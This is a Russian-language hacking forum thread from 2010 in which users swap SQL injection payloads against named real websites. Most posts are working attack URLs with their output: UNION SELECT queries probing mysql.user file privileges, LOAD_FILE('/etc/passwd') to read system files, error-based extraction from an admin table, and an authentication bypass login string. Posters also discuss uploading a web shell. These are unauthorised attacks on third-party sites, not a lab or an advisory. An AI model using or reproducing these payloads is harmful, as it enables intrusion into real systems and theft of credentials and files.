30.03.2010, 00:11
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?
например как быть тут
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+wh ere+user='stmary_stmary'--
тут ведь нет таблицы user
Последний раз редактировалось jecka3000; 30.03.2010 в 00:14..
|
|
|
30.03.2010, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от jecka3000
проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?
в базе данных "mysql" информация о юзверях всегда в табличке "user", во-первых.
Во вторых, для начала проверь есть ли доступ к "mysql.user" - если нет, то file_priv в 95% случаев нет
Смотришь, есть ли доступ к mysql.user.
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+2,2,3,4+from+mysql.user
Доступа нет.
Последний раз редактировалось попугай; 30.03.2010 в 00:18..
|
|
|
|
30.03.2010, 00:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
если нету доступа, то другими способами средствами SQL залить шелл реально?
|
|
|
|
30.03.2010, 00:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
нет, с помощью скули не залить если нет условий для создания файла на серваке посредством БД
|
|
|
|
30.03.2010, 11:08
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 8
С нами:
9081445
Репутация:
0
|
|
Подскажите, пожалуйста, есть здесь SQL Иньекция или нет?
http://www.klipart.ru/package.php?id=symmetricspiders'
|
|
|
|
30.03.2010, 22:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
не могу проверить привилегии
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.u ser+where+user='tourismepmysql'--
доступ к mysql.user вродь есть, в чем трабла?
|
|
|
|
30.03.2010, 22:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от jecka3000
не могу проверить привилегии
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.u ser+where+user='tourismepmysql'--
доступ к mysql.user вродь есть, в чем трабла?
Код:
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,user,3,4,5,6,7+from+mysql.user--
SELECT command denied to user: 'tourismepmysql@10.0.65.117' for table 'user'
1. Нет прав на таблу mysql.user - не проверишь
2. Magic_quotes = ON, where user = 0x746f757269736d65706d7973716c
3. Слушать BlackSun, но помнить про Magic_quotes = ON
|
|
|
|
31.03.2010, 02:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Strilo4ka
бес брута достать логин и пасс возможно!? При обращении к схеме у меня была ошибка... Разве что с not null попробывать.
Код:
_http://www.plan-art.co.uk/case.php?id=116+and+%281,2%29=%28select+*+from+%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29+from+admin%29a%20%29
Ы_Ы
Решено :
_http://www.plan-art.co.uk/case.php?id=116+and+%28select+*+from+admin+union+s elect+1,2%0%29=%281,2%29
Query failed: Column 'password' cannot be null
_http://www.plan-art.co.uk/case.php?id=116+and+%28select+*+from+admin+union+s elect+1%0,2%29=%281,2%29
Query failed: Column 'username' cannot be null
Тока таблица admin пустая1
Что со схемой - ХЗ! 
Последний раз редактировалось Strilo4ka; 31.03.2010 в 02:40..
|
|
|
|
30.03.2010, 22:18
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
С помощью LOAD_FILE проверь.
|
|
|
|
31.03.2010, 12:59
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
FlaktW,
login: 'or+5=5/*
password: asdfgh
 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
